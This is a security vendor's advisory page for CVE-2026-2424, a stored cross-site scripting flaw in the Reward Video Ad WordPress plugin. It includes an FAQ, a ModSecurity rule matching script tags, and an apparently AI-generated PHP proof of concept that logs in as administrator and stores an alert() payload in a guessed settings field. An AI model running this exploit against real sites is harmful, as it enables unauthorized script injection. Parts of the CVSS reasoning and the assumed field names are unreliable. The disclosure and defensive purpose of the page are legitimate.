What is CVE-2026-2424?

CVE-2026-2424 is a Stored Cross-Site Scripting (XSS) vulnerability in the Reward Video Ad for WordPress plugin, affecting versions up to 1.6. It allows authenticated users with administrator privileges to inject malicious scripts into the plugin’s admin settings, which can then execute in the browsers of users who access the affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping on certain admin settings fields. An attacker can input a malicious script into fields like ‘Account ID’ or ‘Message before the video’, which is then stored in the database and executed when other users view the affected content.

Who is affected by this vulnerability?

Any WordPress site using the Reward Video Ad plugin version 1.6 or earlier is at risk. Specifically, only users with administrator-level access can exploit this vulnerability, but all users who visit the affected pages could be impacted by the injected scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Reward Video Ad plugin you are using. If it is version 1.6 or earlier, review the admin settings for any suspicious entries or scripts. Additionally, consider conducting a security audit or using vulnerability scanning tools.

What should I do to fix or mitigate this vulnerability?

To remediate this vulnerability, update the Reward Video Ad plugin to the latest version that addresses the issue. Additionally, ensure that all user inputs are properly sanitized and escaped before being saved or displayed. Implementing security best practices for WordPress can further reduce risks.

What does the CVSS score of 4.4 indicate?

The CVSS score of 4.4 indicates a medium severity level, suggesting that while the vulnerability requires specific conditions to be exploited (administrator access), it can still pose significant risks if successfully exploited, such as session hijacking or defacement.

What are the practical risks associated with this vulnerability?

The practical risks include the possibility of attackers injecting malicious scripts that can execute in the context of other users’ sessions. This can lead to data theft, unauthorized actions on behalf of users, and overall compromise of site integrity.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can log into the WordPress admin panel and inject a script into the plugin’s settings. By executing this script, the attacker can confirm the presence of the vulnerability and demonstrate its potential impact.

Is there a way to prevent this vulnerability from being exploited?

To prevent exploitation, ensure that only trusted users have administrator access to the WordPress dashboard. Regularly update all plugins and themes, and employ security plugins that can help monitor and block suspicious activities.

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. This can lead to various attacks, including data theft and unauthorized actions performed in the context of the victim’s session.

What is the importance of input sanitization and output escaping?

Input sanitization and output escaping are critical practices in web development that help prevent vulnerabilities like XSS. Sanitization ensures that user input is cleaned and safe before being stored, while escaping ensures that any output is rendered safely in the browser, preventing script execution.

What are the next steps after patching the vulnerability?

After patching the vulnerability, conduct a thorough review of your site’s security posture. Consider implementing regular security audits, monitoring for suspicious activity, and educating users about safe practices to further protect against potential threats.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 25, 2026

CVE-2026-2424: Reward Video Ad for WordPress <= 1.6 – Authenticated (Administrator+) Stored Cross-Site Scripting via Admin Settings (applixir)

CVE ID CVE-2026-2424

Plugin applixir

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 1.6

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2424 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Reward Video Ad for WordPress plugin (applixir) up to version 1.6. The vulnerability resides in the plugin’s admin settings interface, allowing attackers with administrator privileges to inject malicious scripts that persist and execute for other users.

Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping on several plugin settings fields, including ‘Account ID’, ‘Message before the video’, and color fields. This CWE-79 pattern is common in WordPress plugins where user input from admin forms is saved to the database without proper sanitization using functions like `sanitize_text_field`, then later output without escaping via functions like `esc_attr` or `esc_html`. The vulnerability description confirms the lack of sanitization and escaping, but the exact code location is inferred from the CWE classification and typical WordPress admin settings patterns.

Exploitation requires an attacker to have administrator-level access to the WordPress dashboard. The attacker would navigate to the plugin’s settings page, likely under a menu like ‘Reward Video Ad’ or within the WordPress admin panel. They would then submit a malicious payload into one of the vulnerable fields, such as the ‘Message before the video’ textarea. A typical payload would be `alert(document.domain)`. Upon saving the settings, this script is stored in the WordPress database. The script executes in the browser of any user who later views a page where the plugin renders this unsanitized setting, such as a frontend page containing the video ad unit.

Remediation requires implementing proper input validation and output escaping. The plugin developers should sanitize all user input on the server-side before saving it to the database, using WordPress core functions like `sanitize_text_field` for text inputs and `sanitize_hex_color` for color fields. Additionally, all output of these settings must be escaped contextually before being rendered in HTML, using functions like `esc_html` for text content and `esc_attr` for HTML attributes. A nonce check should also be present on the settings form submission to prevent CSRF attacks, though the CVE description does not mention its absence.

The impact of this vulnerability is limited to stored XSS attacks. A successful exploit allows an attacker with administrator privileges to inject arbitrary JavaScript that executes in the context of any user viewing the affected page. This can lead to session hijacking, defacement, or malicious redirects for users, including other administrators. The CVSS score of 4.4 reflects the high attack complexity (AC:H) due to the required administrator privilege (PR:H) and the need for user interaction to view the poisoned page (UI:N).

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2424 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin.php" 
  "id:20262424,phase:2,deny,status:403,chain,msg:'CVE-2026-2424 via applixir plugin admin settings',severity:'CRITICAL',tag:'CVE-2026-2424',tag:'WordPress',tag:'applixir',tag:'XSS'"
  SecRule ARGS_GET:page "@streq applixir" "chain"
    SecRule ARGS_POST:action "@streq save" "chain"
      SecRule ARGS_POST:applixir_message_before "@rx <script[^>]*>" 
        "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2424 - Reward Video Ad for WordPress <= 1.6 - Authenticated (Administrator+) Stored Cross-Site Scripting via Admin Settings
<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=applixir'; // Assumed admin settings page
$username = 'admin'; // Administrator username
$password = 'password'; // Administrator password
$payload = '<script>alert("Atomic Edge XSS Test: "+document.domain)</script>';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, str_replace('wp-admin/admin.php', 'wp-login.php', $target_url));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login nonce (WordPress login includes a hidden nonce field 'log')
$login_page = curl_exec($ch);
preg_match('/name="_wpnonce" value="([^"]+)"/', $login_page, $matches);
$login_nonce = $matches[1] ?? '';

// Perform login
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1',
    '_wpnonce' => $login_nonce
];
curl_setopt($ch, CURLOPT_URL, str_replace('wp-admin/admin.php', 'wp-login.php', $target_url));
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$login_response = curl_exec($ch);

// Check if login succeeded by accessing the admin page
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, false);
$admin_page = curl_exec($ch);

// Extract the settings form nonce (assumed field name 'applixir_settings_nonce')
preg_match('/name="applixir_settings_nonce" value="([^"]+)"/', $admin_page, $matches);
$settings_nonce = $matches[1] ?? '';

if (empty($settings_nonce)) {
    die('Could not find settings nonce. Plugin admin page structure may differ.');
}

// Submit the XSS payload to the settings form
// Assumes the form submits via POST to admin.php?page=applixir with an 'action' parameter of 'save'
$exploit_fields = [
    'action' => 'save',
    'applixir_settings_nonce' => $settings_nonce,
    'applixir_account_id' => 'test_account', // Legitimate value
    'applixir_message_before' => $payload, // Injected into vulnerable field
    'applixir_color_primary' => '#ffffff' // Legitimate value
];
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
$exploit_response = curl_exec($ch);

// Verify the payload was stored by fetching the frontend page where the plugin renders
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-site.com/');
curl_setopt($ch, CURLOPT_POST, false);
$frontend_page = curl_exec($ch);

if (strpos($frontend_page, $payload) !== false) {
    echo "SUCCESS: XSS payload likely stored. Check frontend page source for: " . htmlspecialchars($payload) . "n";
} else {
    echo "Payload may not have been stored or plugin renders on different pages.n";
}

curl_close($ch);
unlink('cookies.txt');

?>

Frequently Asked Questions

What is CVE-2026-2424?
Overview of the vulnerability
CVE-2026-2424 is a Stored Cross-Site Scripting (XSS) vulnerability in the Reward Video Ad for WordPress plugin, affecting versions up to 1.6. It allows authenticated users with administrator privileges to inject malicious scripts into the plugin’s admin settings, which can then execute in the browsers of users who access the affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping on certain admin settings fields. An attacker can input a malicious script into fields like ‘Account ID’ or ‘Message before the video’, which is then stored in the database and executed when other users view the affected content.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Reward Video Ad plugin version 1.6 or earlier is at risk. Specifically, only users with administrator-level access can exploit this vulnerability, but all users who visit the affected pages could be impacted by the injected scripts.
How can I check if my site is vulnerable?
Steps for assessment
To check if your site is vulnerable, verify the version of the Reward Video Ad plugin you are using. If it is version 1.6 or earlier, review the admin settings for any suspicious entries or scripts. Additionally, consider conducting a security audit or using vulnerability scanning tools.
What should I do to fix or mitigate this vulnerability?
Recommended actions
To remediate this vulnerability, update the Reward Video Ad plugin to the latest version that addresses the issue. Additionally, ensure that all user inputs are properly sanitized and escaped before being saved or displayed. Implementing security best practices for WordPress can further reduce risks.
What does the CVSS score of 4.4 indicate?
Understanding the severity rating
The CVSS score of 4.4 indicates a medium severity level, suggesting that while the vulnerability requires specific conditions to be exploited (administrator access), it can still pose significant risks if successfully exploited, such as session hijacking or defacement.
What are the practical risks associated with this vulnerability?
Potential impacts on users
The practical risks include the possibility of attackers injecting malicious scripts that can execute in the context of other users’ sessions. This can lead to data theft, unauthorized actions on behalf of users, and overall compromise of site integrity.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided illustrates how an attacker can log into the WordPress admin panel and inject a script into the plugin’s settings. By executing this script, the attacker can confirm the presence of the vulnerability and demonstrate its potential impact.
Is there a way to prevent this vulnerability from being exploited?
Preventative measures
To prevent exploitation, ensure that only trusted users have administrator access to the WordPress dashboard. Regularly update all plugins and themes, and employ security plugins that can help monitor and block suspicious activities.
What is Cross-Site Scripting (XSS)?
Basic definition of XSS
Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. This can lead to various attacks, including data theft and unauthorized actions performed in the context of the victim’s session.
What is the importance of input sanitization and output escaping?
Key security practices
Input sanitization and output escaping are critical practices in web development that help prevent vulnerabilities like XSS. Sanitization ensures that user input is cleaned and safe before being stored, while escaping ensures that any output is rendered safely in the browser, preventing script execution.
What are the next steps after patching the vulnerability?
Post-remediation actions
After patching the vulnerability, conduct a thorough review of your site’s security posture. Consider implementing regular security audits, monitoring for suspicious activity, and educating users about safe practices to further protect against potential threats.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations